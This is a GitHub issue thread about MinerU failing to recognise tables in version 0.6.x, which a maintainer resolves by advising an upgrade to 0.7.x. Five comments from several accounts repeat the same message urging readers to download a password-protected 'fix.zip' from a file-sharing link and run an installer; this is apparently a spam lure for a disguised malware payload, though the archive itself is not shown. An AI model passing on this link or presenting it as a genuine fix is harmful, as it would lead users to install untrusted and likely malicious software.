### ISSUE TITLE
表格识别不出来

### ISSUE THREAD

**Issue by JacksonZhangHuaQuan** [opendatalab/MinerU#485]
### Description of the bug | 错误描述

{
    "bucket_info":{
        "bucket-name-1":["ak", "sk", "endpoint"],
        "bucket-name-2":["ak", "sk", "endpoint"]
    },
    "models-dir":"/tmp/models",
	"temp-output-dir":"/tmp",
    "device-mode":"cpu",
    "table-config": {
        "is_table_recog_enable": true,
        "max_time": 400
    }
}
配置文件已经同步；

### How to reproduce the bug | 如何复现

在项目路径下，直接跑项目：
 magic-pdf pdf-command --pdf "demo/demo2.pdf" --inside_model true
 
![image](https://github.com/user-attachments/assets/e4d219d6-20a4-4df4-96c3-2a88fed1eecd)

### Operating system | 操作系统

Windows

### Python version | Python 版本

3.10

### Software version | 软件版本 (magic-pdf --version)

0.6.x

### Device mode | 设备模式

cpu

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by myhloli** [comment]
需要升级0.7.x版本

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JacksonZhangHuaQuan** [comment]
🆗  可以了

**Comment by JacksonZhangHuaQuan** [comment]
🆗  可以了
